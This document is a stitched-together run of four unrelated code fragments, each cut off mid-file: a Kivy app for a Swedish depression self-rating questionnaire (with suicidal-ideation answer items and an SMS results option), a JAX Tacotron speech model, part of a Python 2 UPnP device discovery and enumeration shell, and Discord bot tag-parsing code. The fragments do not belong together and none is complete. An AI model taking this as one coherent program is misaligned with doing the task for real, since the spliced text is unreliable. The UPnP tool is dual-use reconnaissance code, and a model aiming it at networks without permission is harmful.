bättre att vara död, och trots att jag egentligen inte önskar det, kan självmord ibland kännas som en möjlig utväg.", "5", "6 Jag är egentligen övertygad om att min enda utväg är att dö, och jag tänker mycket på hur jag bäst skall gå tillväga för att ta mitt eget liv." ) ) valuetuple=(0,0,0,0,0,0,0,0,0) bttns=(0,0,0,0,0,0,0,0,0) bigheight=NumericProperty() fontheight=15 linelen=30 def __init__ (self,**kwargs): super (MainScreen, self).__init__(**kwargs) self.planupdate() def planupdate(self): self.bigheight=0 thescroll=ScrollView(size= self.size, bar_pos_x="top") bigbox=GridLayout( cols=1, orientation='vertical', #height=self.minimum_height, #height=root.bigheight, #padding= (thescroll.width * 0.02, thescroll.height * 0.02), #spacing= (thescroll.width * 0.02, thescroll.height * 0.02), size_hint_y= None, size_hint_x= 1, do_scroll_x= False, do_scroll_y= True, ) #self.linelen=self.ids.bigbox.width/sp(self.fontheight) try: self.ids.checkboxes.clear_widgets() self.ids.megabox.clear_widgets() except: pass for i in range(0,9): if self.fontheight*(len(self.qlist[i])/self.linelen) > self.fontheight : qheight=0*self.fontheight+self.fontheight*(len(self.qlist[i])/self.linelen) else: qheight=self.fontheight newq=Label(color=(0,0,0,1), size_hint_y=None, size_hint_x=1, size=(bigbox.width, "%ssp"%str(qheight)))#, font_size=self.fontheight) newq.bind(width=lambda s, w: s.setter('text_size')(s, (self.width, None))) newq.bind(height=newq.setter('texture_size[1]')) newq.bind(height=newq.setter('self.minimum_height')) newbox=Button(id="box%s"%str(i)) txt='' if self.bttns[i]==1: txt=str(self.valuetuple[i]) newbox.color=(1,1,1,1) elif self.bttns[i]==0: txt="*" newbox.color=(0,0,0,1) newbox.text=txt if i==self.nownr: newbox.background_color= (.25, .75, 1.0, 1.0) newq.text=str("%s"%self.qlist[i]) self.bigheight=self.bigheight+2*newq.height bigbox.add_widget(newq) for j in range(0,7): if self.fontheight*(len(self.dscrptn[i][j])/self.linelen) > 3*self.fontheight : bttnheight=2*self.fontheight+self.fontheight*(len(self.dscrptn[i][j])/self.linelen) else: bttnheight=3*self.fontheight smallLabel=Button(text="%s"%self.dscrptn[i][j],size_hint=(1,None), height="%ssp"%str(bttnheight))#, font_size=self.fontheight) smallLabel.bind(width=lambda s, w: s.setter('text_size')(s, (self.width-100, None))) smallLabel.bind(height=smallLabel.setter('texture_size[1]')) smallLabel.bind(height=smallLabel.setter('self.minimum_height')) smallLabel.bind(on_press=partial(self.radiobox, i, j)) if self.valuetuple[i] == j and self.bttns[i]==1: smallLabel.background_color = (.25, .75, 1.0, 1.0) else: smallLabel.background_color = (1.0, 1.0, 1.0, 1.0) bigbox.add_widget(smallLabel) self.bigheight=self.bigheight+smallLabel.height newbox.bind(on_release=partial(self.chng_bttn, i)) self.ids.checkboxes.add_widget(newbox) bigbox.height=self.bigheight thescroll.bar_pos_x="top" thescroll.add_widget(bigbox) self.ids.megabox.add_widget(thescroll) sendbox=Button(id="sendbox", text=">>") sendbox.bind(on_release=(lambda store_btn: self.Submit())) self.ids.checkboxes.add_widget(sendbox) def radiobox(self, i,j,*args): listV = list(self.valuetuple) listV[i]=j listB = list(self.bttns) listB[i]=1 #self.ids.eval("chckbx%set%s"%(str(i),str(j))) #myCheckBox1.value = True self.valuetuple = tuple(listV) self.bttns = tuple(listB) maxloops=2*len(self.bttns)-1 loops=0 number=i while self.bttns[number] == 1 : loops += 1 if number == len(self.bttns)-1: number=0 if loops==maxloops: self.nownr=i break number += 1 self.nownr=number self.planupdate() def chng_bttn(self,number, *args): self.nownr=number self.planupdate() def settings(self): box = BoxLayout(orientation='vertical') popup1 = Popup(title='SMS-nr', content=box, size_hint=(.90, .90)) biggerbox=BoxLayout(orientation='horizontal') biggerbox.add_widget(Label(text='SMS-mottagarens nummer:')) #inpt=TextInput(multiline=False,input_type='number') try: inpt=TextInput(multiline=False,input_type='number',text=settingdata.get('email')['address']) except: inpt=TextInput(multiline=False,input_type='number',text="") biggerbox.add_widget(inpt) store_btn = Button(text='OK') store_btn.bind(on_release=(lambda store_btn: self.change_mail(inpt.text, popup1))) #store_btn.bind(on_press = lambda *args: popup1.dismiss()) box.add_widget(biggerbox) box.add_widget(store_btn) popup1.open() def Submit(self): filled = 1 for i in self.bttns : if i == 0 : filled=0 if filled==0 : box = BoxLayout(orientation='vertical') popup1 = Popup(title='', content=box, size_hint=(.75, .75)) box.add_widget(Label(text='Var god och svara på alla frågor.')) store_btn = Button(text='OK') store_btn.bind(on_press = lambda *args: popup1.dismiss()) box.add_widget(store_btn) popup1.open() else: summa=sum(self.valuetuple) box = BoxLayout(orientation='vertical') popup1 = Popup(title='',
<gh_stars>1-10 """ Tacotron + stepwise monotonic attention """ import jax import jax.numpy as jnp import pax def conv_block(in_ft, out_ft, kernel_size, activation_fn, use_dropout): """ Conv >> LayerNorm >> activation >> Dropout """ f = pax.Sequential( pax.Conv1D(in_ft, out_ft, kernel_size, with_bias=False), pax.LayerNorm(out_ft, -1, True, True), ) if activation_fn is not None: f >>= activation_fn if use_dropout: f >>= pax.Dropout(0.5) return f class HighwayBlock(pax.Module): """ Highway block """ def __init__(self, dim: int) -> None: super().__init__() self.dim = dim self.fc = pax.Linear(dim, 2 * dim) def __call__(self, x: jnp.ndarray) -> jnp.ndarray: t, h = jnp.split(self.fc(x), 2, axis=-1) t = jax.nn.sigmoid(t - 1.0) # bias toward keeping x h = jax.nn.relu(h) x = x * (1.0 - t) + h * t return x class BiGRU(pax.Module): """ Bidirectional GRU """ def __init__(self, dim): super().__init__() self.rnn_fwd = pax.GRU(dim, dim) self.rnn_bwd = pax.GRU(dim, dim) def __call__(self, x, reset_masks): N = x.shape[0] x_fwd = x x_bwd = jnp.flip(x, axis=1) x_fwd_states = self.rnn_fwd.initial_state(N) x_bwd_states = self.rnn_bwd.initial_state(N) x_fwd_states, x_fwd = pax.scan( self.rnn_fwd, x_fwd_states, x_fwd, time_major=False ) reset_masks = jnp.flip(reset_masks, axis=1) x_bwd_states0 = x_bwd_states def rnn_reset_core(prev, inputs): x, reset_mask = inputs def reset_state(x0, xt): return jnp.where(reset_mask, x0, xt) state, _ = self.rnn_bwd(prev, x) state = jax.tree_map(reset_state, x_bwd_states0, state) return state, state.hidden x_bwd_states, x_bwd = pax.scan( rnn_reset_core, x_bwd_states, (x_bwd, reset_masks), time_major=False ) x_bwd = jnp.flip(x_bwd, axis=1) x = jnp.concatenate((x_fwd, x_bwd), axis=-1) return x class CBHG(pax.Module): """ Conv Bank >> Highway net >> GRU """ def __init__(self, dim): super().__init__() self.convs = [conv_block(dim, dim, i, jax.nn.relu, False) for i in range(1, 17)] self.conv_projection_1 = conv_block(16 * dim, dim, 3, jax.nn.relu, False) self.conv_projection_2 = conv_block(dim, dim, 3, None, False) self.highway = pax.Sequential( HighwayBlock(dim), HighwayBlock(dim), HighwayBlock(dim), HighwayBlock(dim) ) self.rnn = BiGRU(dim) def __call__(self, x, x_mask): conv_input = x * x_mask fts = [f(conv_input) for f in self.convs] residual = jnp.concatenate(fts, axis=-1) residual = pax.max_pool(residual, 2, 1, "SAME", -1) residual = self.conv_projection_1(residual * x_mask) residual = self.conv_projection_2(residual * x_mask) x = x + residual x = self.highway(x) x = self.rnn(x * x_mask, reset_masks=1 - x_mask) return x * x_mask class PreNet(pax.Module): """ Linear >> relu >> dropout >> Linear >> relu >> dropout """ def __init__(self, input_dim, hidden_dim, output_dim, always_dropout=True): super().__init__() self.fc1 = pax.Linear(input_dim, hidden_dim) self.fc2 = pax.Linear(hidden_dim, output_dim) self.rng_seq = pax.RngSeq() self.always_dropout = always_dropout def __call__(self, x, k1=None, k2=None): x = self.fc1(x) x = jax.nn.relu(x) if self.always_dropout or self.training: if k1 is None: k1 = self.rng_seq.next_rng_key() x = pax.dropout(k1, 0.5, x) x = self.fc2(x) x = jax.nn.relu(x) if self.always_dropout or self.training: if k2 is None: k2 = self.rng_seq.next_rng_key() x = pax.dropout(k2, 0.5, x) return x class Tacotron(pax.Module): """ Tacotron TTS model. It uses stepwise monotonic attention for robust attention. """ def __init__( self, mel_dim: int, attn_bias, rr, max_rr, mel_min, sigmoid_noise, pad_token, prenet_dim, attn_hidden_dim, attn_rnn_dim, rnn_dim, postnet_dim, text_dim, ): """ New Tacotron model Args: mel_dim (int): dimension of log mel-spectrogram features. attn_bias (float): control how "slow" the attention will move forward at initialization. rr (int): the reduction factor. Number of predicted frame at each time step. Default is 2. max_rr (int): max value of rr. mel_min (float): the minimum value of mel features. The <go> frame is filled by `log(mel_min)` values. sigmoid_noise (float): the variance of gaussian noise added to attention scores in training. pad_token (int): the pad value at the end of text sequences. prenet_dim (int): dimension of prenet output. attn_hidden_dim (int): dimension of attention hidden vectors. attn_rnn_dim (int): number of cells in the attention RNN. rnn_dim (int): number of cells in the decoder RNNs. postnet_dim (int): number of features in the postnet convolutions. text_dim (int): dimension of text embedding vectors. """ super().__init__() self.text_dim = text_dim assert rr <= max_rr self.rr = rr self.max_rr = max_rr self.mel_dim = mel_dim self.mel_min = mel_min self.sigmoid_noise = sigmoid_noise self.pad_token = pad_token self.prenet_dim = prenet_dim # encoder submodules self.encoder_embed = pax.Embed(256, text_dim) self.encoder_pre_net = PreNet(text_dim, 256, prenet_dim, always_dropout=True) self.encoder_cbhg = CBHG(prenet_dim) # random key generator self.rng_seq = pax.RngSeq() # pre-net self.decoder_pre_net = PreNet(mel_dim, 256, prenet_dim, always_dropout=True) # decoder submodules self.attn_rnn = pax.LSTM(prenet_dim + prenet_dim * 2, attn_rnn_dim) self.text_key_fc = pax.Linear(prenet_dim * 2, attn_hidden_dim, with_bias=True) self.attn_query_fc = pax.Linear(attn_rnn_dim, attn_hidden_dim, with_bias=False) self.attn_V = pax.Linear(attn_hidden_dim, 1, with_bias=False) self.attn_V_weight_norm = jnp.array(1.0 / jnp.sqrt(attn_hidden_dim)) self.attn_V_bias = jnp.array(attn_bias) self.attn_log = jnp.zeros((1,)) self.decoder_input = pax.Linear(attn_rnn_dim + 2 * prenet_dim, rnn_dim) self.decoder_rnn1 = pax.LSTM(rnn_dim, rnn_dim) self.decoder_rnn2 = pax.LSTM(rnn_dim, rnn_dim) # mel + end-of-sequence token self.output_fc = pax.Linear(rnn_dim, (mel_dim + 1) * max_rr, with_bias=True) # post-net self.post_net = pax.Sequential( conv_block(mel_dim, postnet_dim, 5, jax.nn.tanh, True), conv_block(postnet_dim, postnet_dim, 5, jax.nn.tanh, True), conv_block(postnet_dim, postnet_dim, 5, jax.nn.tanh, True), conv_block(postnet_dim, postnet_dim, 5, jax.nn.tanh, True), conv_block(postnet_dim, mel_dim, 5, None, True), ) parameters = pax.parameters_method("attn_V_weight_norm", "attn_V_bias") def encode_text(self, text: jnp.ndarray) -> jnp.ndarray: """ Encode text to a sequence of real vectors """ N, L = text.shape text_mask = (text != self.pad_token)[..., None] x = self.encoder_embed(text) x = self.encoder_pre_net(x) x = self.encoder_cbhg(x, text_mask) return x def go_frame(self, batch_size: int) -> jnp.ndarray: """ return the go frame """ return jnp.ones((batch_size, self.mel_dim)) * jnp.log(self.mel_min) def decoder_initial_state(self, N: int, L: int): """ setup decoder initial state """ attn_context = jnp.zeros((N, self.prenet_dim * 2)) attn_pr = jax.nn.one_hot( jnp.zeros((N,), dtype=jnp.int32), num_classes=L, axis=-1 ) attn_state = (self.attn_rnn.initial_state(N), attn_context, attn_pr) decoder_rnn_states = ( self.decoder_rnn1.initial_state(N), self.decoder_rnn2.initial_state(N), ) return attn_state, decoder_rnn_states def monotonic_attention(self, prev_state, inputs, envs): """ Stepwise monotonic attention """ attn_rnn_state, attn_context, prev_attn_pr = prev_state x, attn_rng_key = inputs text, text_key = envs attn_rnn_input = jnp.concatenate((x, attn_context), axis=-1) attn_rnn_state, attn_rnn_output = self.attn_rnn(attn_rnn_state, attn_rnn_input) attn_query_input = attn_rnn_output attn_query = self.attn_query_fc(attn_query_input) attn_hidden = jnp.tanh(attn_query[:, None, :] + text_key) score = self.attn_V(attn_hidden) score = jnp.squeeze(score, axis=-1) weight_norm = jnp.linalg.norm(self.attn_V.weight) score = score * (self.attn_V_weight_norm / weight_norm) score = score + self.attn_V_bias noise = jax.random.normal(attn_rng_key, score.shape) * self.sigmoid_noise pr_stay = jax.nn.sigmoid(score + noise) pr_move = 1.0 - pr_stay pr_new_location = pr_move * prev_attn_pr pr_new_location = jnp.pad( pr_new_location[:, :-1], ((0, 0), (1, 0)), constant_values=0 ) attn_pr = pr_stay * prev_attn_pr + pr_new_location attn_context = jnp.einsum("NL,NLD->ND", attn_pr, text) new_state = (attn_rnn_state, attn_context, attn_pr) return new_state, attn_rnn_output def zoneout_lstm(self, lstm_core, rng_key, zoneout_pr=0.1): """ Return a zoneout lstm core. It will zoneout the new hidden states and keep the new cell states unchanged. """ def core(state, x): new_state, _ = lstm_core(state, x) h_old = state.hidden h_new = new_state.hidden mask = jax.random.bernoulli(rng_key, zoneout_pr, h_old.shape) h_new = h_old * mask + h_new * (1.0 - mask) return pax.LSTMState(h_new, new_state.cell), h_new return core def decoder_step( self, attn_state, decoder_rnn_states, rng_key, mel, text, text_key, call_pre_net=False, ): """ One decoder step """ if call_pre_net: k1, k2, zk1, zk2, rng_key, rng_key_next = jax.random.split(rng_key, 6) mel = self.decoder_pre_net(mel, k1, k2) else: zk1, zk2, rng_key, rng_key_next = jax.random.split(rng_key, 4) attn_inputs = (mel, rng_key) attn_envs = (text, text_key) attn_state, attn_rnn_output = self.monotonic_attention( attn_state, attn_inputs, attn_envs ) (_, attn_context, attn_pr) = attn_state (decoder_rnn_state1, decoder_rnn_state2) = decoder_rnn_states decoder_rnn1_input = jnp.concatenate((attn_rnn_output, attn_context), axis=-1) decoder_rnn1_input = self.decoder_input(decoder_rnn1_input) decoder_rnn1 = self.zoneout_lstm(self.decoder_rnn1, zk1) decoder_rnn_state1, decoder_rnn_output1 = decoder_rnn1( decoder_rnn_state1, decoder_rnn1_input ) decoder_rnn2_input = decoder_rnn1_input + decoder_rnn_output1 decoder_rnn2 = self.zoneout_lstm(self.decoder_rnn2, zk2) decoder_rnn_state2, decoder_rnn_output2 = decoder_rnn2( decoder_rnn_state2, decoder_rnn2_input ) x = decoder_rnn1_input + decoder_rnn_output1 + decoder_rnn_output2 decoder_rnn_states = (decoder_rnn_state1, decoder_rnn_state2) return attn_state, decoder_rnn_states, rng_key_next, x, attn_pr[0] def inference(self, text, seed=42, max_len=1000): """ text to mel """ text = self.encode_text(text) text_key = self.text_key_fc(text) N, L, D = text.shape assert N == 1 mel = self.go_frame(N) @jax.jit def step(attn_state, decoder_rnn_states, rng_key, mel): attn_state, decoder_rnn_states, rng_key, x, _ = self.decoder_step( attn_state, decoder_rnn_states, rng_key, mel, text, text_key, call_pre_net=True, ) x = self.output_fc(x) N, D2 = x.shape x = jnp.reshape(x, (N, self.max_rr, D2 // self.max_rr)) x = x[:, : self.rr, :] x = jnp.reshape(x, (N, self.rr, -1)) mel = x[..., :-1] eos_logit = x[..., -1] eos_pr = jax.nn.sigmoid(eos_logit[0, -1]) rng_key, eos_rng_key = jax.random.split(rng_key) eos = jax.random.bernoulli(eos_rng_key, p=eos_pr) return attn_state, decoder_rnn_states, rng_key, (mel, eos) attn_state, decoder_rnn_states = self.decoder_initial_state(N, L) rng_key = jax.random.PRNGKey(seed) mels = [] count = 0 while True: count = count + 1 attn_state, decoder_rnn_states, rng_key, (mel, eos) = step( attn_state, decoder_rnn_states, rng_key, mel ) mels.append(mel) if eos.item() or count > max_len: break mel = mel[:, -1, :] mels
= "deviceType" deviceListEntries = "deviceList" deviceTags = ["friendlyName","modelDescription","modelName","modelNumber","modelURL","presentationURL","UDN","UPC","manufacturer","manufacturerURL"] #Find all device entries listed in the XML file for device in xmlRoot.getElementsByTagName(devTag): try: #Get the deviceType string deviceTypeName = str(device.getElementsByTagName(deviceType)[0].childNodes[0].data) except: continue #Pull out the action device name from the deviceType string deviceDisplayName = self.parseDeviceTypeName(deviceTypeName) if not deviceDisplayName: continue #Create a new device entry for this host in the ENUM_HOSTS structure deviceEntryPointer = self.ENUM_HOSTS[index][deviceListEntries][deviceDisplayName] = {} deviceEntryPointer['fullName'] = deviceTypeName #Parse out all the device tags for that device for tag in deviceTags: try: deviceEntryPointer[tag] = str(device.getElementsByTagName(tag)[0].childNodes[0].data) except Exception, e: if self.VERBOSE: print 'Device',deviceEntryPointer['fullName'],'does not have a',tag continue #Get a list of all services for this device listing self.parseServiceList(device,deviceEntryPointer,index) return #Parse the list of services specified in the XML file def parseServiceList(self,xmlRoot,device,index): serviceEntryPointer = False dictName = "services" serviceListTag = "serviceList" serviceTag = "service" serviceNameTag = "serviceType" serviceTags = ["serviceId","controlURL","eventSubURL","SCPDURL"] try: device[dictName] = {} #Get a list of all services offered by this device for service in xmlRoot.getElementsByTagName(serviceListTag)[0].getElementsByTagName(serviceTag): #Get the full service descriptor serviceName = str(service.getElementsByTagName(serviceNameTag)[0].childNodes[0].data) #Get the service name from the service descriptor string serviceDisplayName = self.parseServiceTypeName(serviceName) if not serviceDisplayName: continue #Create new service entry for the device in ENUM_HOSTS serviceEntryPointer = device[dictName][serviceDisplayName] = {} serviceEntryPointer['fullName'] = serviceName #Get all of the required service info and add it to ENUM_HOSTS for tag in serviceTags: serviceEntryPointer[tag] = str(service.getElementsByTagName(tag)[0].childNodes[0].data) #Get specific service info about this service self.parseServiceInfo(serviceEntryPointer,index) except Exception, e: print 'Caught exception while parsing device service list:',e #Parse details about each service (arguements, variables, etc) def parseServiceInfo(self,service,index): argIndex = 0 argTags = ['direction','relatedStateVariable'] actionList = 'actionList' actionTag = 'action' nameTag = 'name' argumentList = 'argumentList' argumentTag = 'argument' #Get the full path to the service's XML file xmlFile = self.ENUM_HOSTS[index]['proto'] + self.ENUM_HOSTS[index]['name'] if not xmlFile.endswith('/') and not service['SCPDURL'].startswith('/'): try: xmlServiceFile = self.ENUM_HOSTS[index]['xmlFile'] slashIndex = xmlServiceFile.rfind('/') xmlFile = xmlServiceFile[:slashIndex] + '/' except: xmlFile += '/' if self.ENUM_HOSTS[index]['proto'] in service['SCPDURL']: xmlFile = service['SCPDURL'] else: xmlFile += service['SCPDURL'] service['actions'] = {} #Get the XML file that describes this service (xmlHeaders,xmlData) = self.getXML(xmlFile) if not xmlData: print 'Failed to retrieve service descriptor located at:',xmlFile return False try: xmlRoot = minidom.parseString(xmlData) #Get a list of actions for this service try: actionList = xmlRoot.getElementsByTagName(actionList)[0] except: print 'Failed to retrieve action list for service %s!' % service['fullName'] return False actions = actionList.getElementsByTagName(actionTag) if actions == []: return False #Parse all actions in the service's action list for action in actions: #Get the action's name try: actionName = str(action.getElementsByTagName(nameTag)[0].childNodes[0].data).strip() except: print 'Failed to obtain service action name (%s)!' % service['fullName'] continue #Add the action to the ENUM_HOSTS dictonary service['actions'][actionName] = {} service['actions'][actionName]['arguments'] = {} #Parse all of the action's arguments try: argList = action.getElementsByTagName(argumentList)[0] except: #Some actions may take no arguments, so continue without raising an error here... continue #Get all the arguments in this action's argument list arguments = argList.getElementsByTagName(argumentTag) if arguments == []: if self.VERBOSE: print 'Action',actionName,'has no arguments!' continue #Loop through the action's arguments, appending them to the ENUM_HOSTS dictionary for argument in arguments: try: argName = str(argument.getElementsByTagName(nameTag)[0].childNodes[0].data) except: print 'Failed to get argument name for',actionName continue service['actions'][actionName]['arguments'][argName] = {} #Get each required argument tag value and add them to ENUM_HOSTS for tag in argTags: try: service['actions'][actionName]['arguments'][argName][tag] = str(argument.getElementsByTagName(tag)[0].childNodes[0].data) except: print 'Failed to find tag %s for argument %s!' % (tag,argName) continue #Parse all of the state variables for this service self.parseServiceStateVars(xmlRoot,service) except Exception, e: print 'Caught exception while parsing Service info for service %s: %s' % (service['fullName'],str(e)) return False return True #Get info about a service's state variables def parseServiceStateVars(self,xmlRoot,servicePointer): na = 'N/A' varVals = ['sendEvents','dataType','defaultValue','allowedValues'] serviceStateTable = 'serviceStateTable' stateVariable = 'stateVariable' nameTag = 'name' dataType = 'dataType' sendEvents = 'sendEvents' allowedValueList = 'allowedValueList' allowedValue = 'allowedValue' allowedValueRange = 'allowedValueRange' minimum = 'minimum' maximum = 'maximum' #Create the serviceStateVariables entry for this service in ENUM_HOSTS servicePointer['serviceStateVariables'] = {} #Get a list of all state variables associated with this service try: stateVars = xmlRoot.getElementsByTagName(serviceStateTable)[0].getElementsByTagName(stateVariable) except: #Don't necessarily want to throw an error here, as there may be no service state variables return False #Loop through all state variables for var in stateVars: for tag in varVals: #Get variable name try: varName = str(var.getElementsByTagName(nameTag)[0].childNodes[0].data) except: print 'Failed to get service state variable name for service %s!' % servicePointer['fullName'] continue servicePointer['serviceStateVariables'][varName] = {} try: servicePointer['serviceStateVariables'][varName]['dataType'] = str(var.getElementsByTagName(dataType)[0].childNodes[0].data) except: servicePointer['serviceStateVariables'][varName]['dataType'] = na try: servicePointer['serviceStateVariables'][varName]['sendEvents'] = str(var.getElementsByTagName(sendEvents)[0].childNodes[0].data) except: servicePointer['serviceStateVariables'][varName]['sendEvents'] = na servicePointer['serviceStateVariables'][varName][allowedValueList] = [] #Get a list of allowed values for this variable try: vals = var.getElementsByTagName(allowedValueList)[0].getElementsByTagName(allowedValue) except: pass else: #Add the list of allowed values to the ENUM_HOSTS dictionary for val in vals: servicePointer['serviceStateVariables'][varName][allowedValueList].append(str(val.childNodes[0].data)) #Get allowed value range for this variable try: valList = var.getElementsByTagName(allowedValueRange)[0] except: pass else: #Add the max and min values to the ENUM_HOSTS dictionary servicePointer['serviceStateVariables'][varName][allowedValueRange] = [] try: servicePointer['serviceStateVariables'][varName][allowedValueRange].append(str(valList.getElementsByTagName(minimum)[0].childNodes[0].data)) servicePointer['serviceStateVariables'][varName][allowedValueRange].append(str(valList.getElementsByTagName(maximum)[0].childNodes[0].data)) except: pass return True #Update the command completer def updateCmdCompleter(self,struct): indexOnlyList = { 'host' : ['get','details','summary'], 'save' : ['info'] } hostCommand = 'host' subCommandList = ['info'] sendCommand = 'send' try: structPtr = {} topLevelKeys = {} for key,val in struct.iteritems(): structPtr[str(key)] = val topLevelKeys[str(key)] = None #Update the subCommandList for subcmd in subCommandList: self.completer.commands[hostCommand][subcmd] = None self.completer.commands[hostCommand][subcmd] = structPtr #Update the indexOnlyList for cmd,data in indexOnlyList.iteritems(): for subcmd in data: self.completer.commands[cmd][subcmd] = topLevelKeys #This is for updating the sendCommand key structPtr = {} for hostIndex,hostData in struct.iteritems(): host = str(hostIndex) structPtr[host] = {} if hostData.has_key('deviceList'): for device,deviceData in hostData['deviceList'].iteritems(): structPtr[host][device] = {} if deviceData.has_key('services'): for service,serviceData in deviceData['services'].iteritems(): structPtr[host][device][service] = {} if serviceData.has_key('actions'): for action,actionData in serviceData['actions'].iteritems(): structPtr[host][device][service][action] = None self.completer.commands[hostCommand][sendCommand] = structPtr except Exception,e: print "Error updating command completer structure; some command completion features might not work..." return ################## Action Functions ###################### #These functions handle user commands from the shell #Actively search for UPNP devices def msearch(argc,argv,hp): defaultST = "upnp:rootdevice" st = "schemas-upnp-org" myip = '' lport = hp.port if argc >= 3: if argc == 4 or argv[1] != "uuid": if argc == 4: st = argv[1] searchType = argv[2] searchName = argv[3] else: searchType = argv[1] searchName = argv[2] st = "urn:%s:%s:%s:%s" % (st,searchType,searchName,hp.UPNP_VERSION.split('.')[0]) else: uuid = argv[2] st = "uuid:%s" % uuid else: st = defaultST #Build the request request = "M-SEARCH * HTTP/1.1\r\n"\ "HOST:%s:%d\r\n"\ "ST:%s\r\n" % (hp.ip,hp.port,st) for header,value in hp.msearchHeaders.iteritems(): request += header + ':' + value + "\r\n" request += "\r\n" print "Entering discovery mode for '%s', Ctl+C to stop..." % st print '' #Have to create a new socket since replies will be sent directly to our IP, not the multicast IP if hp.LISTENER_LIMIT: myip = gethostbyname(gethostname()) server = hp.createNewListener(myip,lport) if server == False: print 'Failed to bind port %d' % lport return hp.send(request,server) count = 0 start = time.time() while True: try: if hp.MAX_HOSTS > 0 and count >= hp.MAX_HOSTS: break if hp.TIMEOUT > 0 and (time.time() - start) > hp.TIMEOUT: raise Exception("Timeout exceeded") if hp.parseSSDPInfo(hp.recv(1024,server),False,False): count += 1 except Exception, e: print '\nDiscover mode halted...' break #Passively listen for UPNP NOTIFY packets def pcap(argc,argv,hp): print 'Entering passive mode, Ctl+C to stop...' print '' count = 0 start = time.time() while True: try: if hp.MAX_HOSTS > 0 and count >= hp.MAX_HOSTS: break if hp.TIMEOUT > 0 and (time.time() - start) > hp.TIMEOUT: raise Exception ("Timeout exceeded") if hp.parseSSDPInfo(hp.recv(1024,False),False,False): count += 1 except Exception, e: print "\nPassive mode halted..." break #Manipulate M-SEARCH header values def head(argc,argv,hp): if argc >= 2: action = argv[1] #Show current headers if action == 'show': for header,value in hp.msearchHeaders.iteritems(): print header,':',value return #Delete the specified header elif action == 'del': if argc == 3: header = argv[2] if hp.msearchHeaders.has_key(header): del hp.msearchHeaders[header] print '%s removed from header list' % header return else: print '%s is not in the current header list' % header return #Create/set a headers elif action == 'set': if argc == 4: header = argv[2] value = argv[3] hp.msearchHeaders[header] = value print "Added header: '%s:%s" % (header,value) return showHelp(argv[0]) #Manipulate application settings def set(argc,argv,hp): if argc >= 2: action = argv[1] if action == 'uniq': hp.UNIQ = toggleVal(hp.UNIQ) print "Show unique hosts set to: %s" % hp.UNIQ return elif action == 'debug': hp.DEBUG = toggleVal(hp.DEBUG) print "Debug mode set to: %s" % hp.DEBUG return elif action == 'verbose': hp.VERBOSE = toggleVal(hp.VERBOSE) print "Verbose mode set to: %s" % hp.VERBOSE return elif action == 'version': if argc == 3: hp.UPNP_VERSION = argv[2] print 'UPNP version set to: %s' % hp.UPNP_VERSION else: showHelp(argv[0]) return elif action == 'iface': if argc == 3: hp.IFACE = argv[2] print 'Interface set to %s, re-binding sockets...' % hp.IFACE if hp.initSockets(hp.ip,hp.port,hp.IFACE): print 'Interface change successful!' else: print 'Failed to bind new interface - are you sure you have root privilages??' hp.IFACE = None return elif action == 'socket': if argc == 3: try: (ip,port) = argv[2].split(':') port = int(port) hp.ip = ip hp.port = port hp.cleanup() if hp.initSockets(ip,port,hp.IFACE) == False: print "Setting new socket %s:%d failed!" % (ip,port) else: print "Using new socket: %s:%d" % (ip,port) except Exception, e: print 'Caught exception setting new socket:',e return elif action == 'listenerlimit': hp.LISTENER_LIMIT = toggleVal(hp.LISTENER_LIMIT) print "Listener limit set to: %s" % hp.LISTENER_LIMIT return elif action == 'timeout': if argc == 3: try: hp.TIMEOUT = int(argv[2]) except Exception, e: print 'Caught exception setting new timeout value:',e return elif action == 'max': if argc == 3: try: hp.MAX_HOSTS = int(argv[2]) except Exception, e: print 'Caught exception setting new max host value:', e return elif action == 'show': print 'Multicast IP: ',hp.ip print 'Multicast port: ',hp.port print 'Network interface: ',hp.IFACE print 'Receive timeout: ',hp.TIMEOUT print 'Host discovery limit: ',hp.MAX_HOSTS print 'Number of known hosts: ',len(hp.ENUM_HOSTS) print 'Listener limit: ',hp.LISTENER_LIMIT print 'UPNP version: ',hp.UPNP_VERSION print 'Debug mode: ',hp.DEBUG print 'Verbose mode: ',hp.VERBOSE print 'Show only unique hosts:',hp.UNIQ print 'Using log file: ',hp.LOG_FILE return showHelp(argv[0]) return #Host command. It's kind of big. def host(argc,argv,hp): hostInfo = None indexList = [] indexError = "Host index out of range. Try the 'host list' command to get a list of known hosts" if argc >= 2: action = argv[1] if action == 'list': if len(hp.ENUM_HOSTS) == 0: print "No known hosts - try running the 'msearch' or 'pcap' commands" return for index,hostInfo in hp.ENUM_HOSTS.iteritems(): print "\t[%d] %s" % (index,hostInfo['name']) return elif action == 'details': if argc == 3: try: index = int(argv[2]) hostInfo = hp.ENUM_HOSTS[index] except Exception, e: print indexError return try: #If this host data is already complete, just display it if hostInfo['dataComplete'] == True: hp.showCompleteHostInfo(index,False) else: print "Can't show host info because I don't have it. Please run 'host get %d'" % index except KeyboardInterrupt, e: print "" pass return elif action == 'summary': if argc == 3: try: index = int(argv[2]) hostInfo = hp.ENUM_HOSTS[index] except: print indexError return print 'Host:',hostInfo['name'] print 'XML File:',hostInfo['xmlFile'] for deviceName,deviceData in hostInfo['deviceList'].iteritems(): print deviceName for k,v in
or func == "servercount" or func == "membercount": return str(ctx.guild.member_count) if ctx.guild else "2" elif func == "channel": return ctx.channel.name if ctx.guild else "Direct Message" elif func == "channelid": return str(ctx.channel.id) if ctx.channel else "0" elif func.startswith("randuser"): members = await self.get_rand_members(ctx.guild, variables) member = random.choice(members) if func.endswith("id"): return str(member.id) if ctx.guild else str(ctx.author.id) return member.display_name if ctx.guild else ctx.author.display_name elif func.startswith("randonline"): members = await self.get_rand_members(ctx.guild, variables) member = random.choice([m for m in members if m.status is discord.Status.online]) if func.endswith("id"): return str(member.id) if ctx.guild else str(ctx.author.id) return member.display_name if ctx.guild else ctx.author.display_name elif func == "randchannel": return random.choice(list(ctx.guild.channels)).mention if ctx.guild else ctx.channel.mention elif func == "avatar": if len(args) == 1 and args[0] == "": return str(ctx.author.avatar_url) else: user = await self.find_member(ctx.message, args[0]) if user: return str(user.avatar_url) return "" elif func == "nsfw" and ctx.guild: if not ctx.channel.is_nsfw(): raise checks.Nsfw() return "" # Username and nickname searching elif (func == "name" or func == "user" or func == "nick") and args: query = args[0] if not query: return "" users = None if ctx.guild is not None: users = self.finduser(query, ctx.guild) if users is None or not users: users = self.finduser(query) if not users: raise Tag_Find_Error('No user(s) found with "{0}"'.format(query)) elif len(users) > 1: out = 'Multiple users found with "{0}":'.format(query) for u in users[:6]: out += "\n - {}".format(str(u)) if len(users) > 6: out += "\n and {0} more.".format(str(len(users) - 6)) raise Tag_Find_Error(out) return users[0].display_name if func == "nick" else users[0].name # 